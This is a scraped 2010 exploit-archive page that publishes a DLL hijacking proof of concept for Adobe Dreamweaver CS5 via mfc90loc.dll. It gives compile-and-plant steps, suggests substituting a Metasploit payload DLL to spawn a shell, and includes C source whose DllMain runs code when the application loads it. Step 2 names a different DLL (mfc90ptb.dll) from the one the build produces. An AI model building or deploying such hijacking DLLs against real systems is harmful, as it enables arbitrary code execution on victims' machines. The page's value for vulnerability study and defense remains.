Home / os / win7

Adobe Dreamweaver CS5 <= 11.0 build 4909 DLL Hijacking (m

Posted on 25 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Adobe Dreamweaver CS5 &lt;= 11.0 build 4909 DLL Hijacking (mfc90loc.dll)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=====================================================================
Adobe Dreamweaver CS5 &lt;= 11.0 build 4909 DLL Hijacking (mfc90loc.dll)
=====================================================================

# Exploit Title: Adobe Dreamweaver CS5 DLL Hijacking Exploit (mfc90loc.dll)
# Date: 25/08/2010
# Author: Bruno Filipe (diwr) http://digitalacropolis.us
# Software Link: http://www.adobe.com &lt;http://www.bsplayer.org&gt;
# Version: &lt;= 11.0 build 4909
# Tested on: WinXP SP2, WinXP SP3
# Other Adobe CS5 products may be vulnerable too.
# Thx TheLeader ;)
#
----------------------------------------------------------------------------------------------------------
# This should work with any file handled by Dreamweaver (.php, .asp, etc)
# 1. gcc dllmain.c -o mfc90loc.dll
# 2. Put mfc90ptb.dll in the same directory of a file handled by Dw (EG:
anything.php)
# 3. You can generate a msfpayload DLL and spawn a shell, for example.
#
----------------------------------------------------------------------------------------------------------

#include &lt;windows.h&gt;

int main()
{
  WinExec(&quot;calc&quot;, SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  main();
  return 0;
}



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-25]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :